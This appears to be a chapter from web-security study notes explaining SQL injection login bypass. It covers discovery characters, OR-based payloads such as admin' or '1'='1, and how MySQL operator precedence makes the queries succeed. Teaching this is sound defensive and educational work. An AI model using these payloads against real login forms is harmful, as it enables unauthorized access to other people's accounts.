Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Subverting Query Logic

Modifying original SQL queries by injecting the OR operator and using comments to bypass the intended logic.

Authentication Bypass

A typical login query:

SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd';

The application checks if the query returns matching records. If so, login succeeds.

SQLi Discovery

Test for SQL injection by appending payloads to the username field:

PayloadURL Encoded
'%27
"%22
#%23
;%3B
)%29

Use URL-encoded versions when the payload is placed directly in the URL (HTTP GET requests).

Injecting a single quote into the username field produces a syntax error because the resulting query has an odd number of quotes:

SELECT * FROM logins WHERE username=''' AND password = 'something';

A syntax error (instead of “Login Failed”) confirms the form is vulnerable.

OR Injection

The goal is to make the WHERE clause always evaluate to TRUE. Key concept: MySQL evaluates AND before OR (operator precedence).

Known Username

Inject admin' or '1'='1 as the username:

SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';

Evaluation order:

  1. AND first: '1'='1' (True) AND password='something' (False) = False
  2. OR next: username='admin' (True) OR False = True

The query succeeds if admin exists in the table, regardless of the password.

Unknown Username

If the username is unknown, the OR trick in the username field alone won’t work because the username comparison returns False, making the entire expression False.

Instead, inject into the password field as well. Use something' or '1'='1 as the password:

SELECT * FROM logins WHERE username='notAdmin' OR '1'='1' AND password='something' OR '1'='1';

The trailing OR '1'='1' forces the overall query to True, returning all rows. The application logs in as the first user in the table.

Minimal Payload

Both fields can use the same injection — no valid username or password needed:

  • Username: ' or '1' = '1
  • Password: ' or '1' = '1
SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';

This evaluates to True regardless of credentials and returns all rows.

A comprehensive list of auth bypass payloads is available at PayloadsAllTheThings.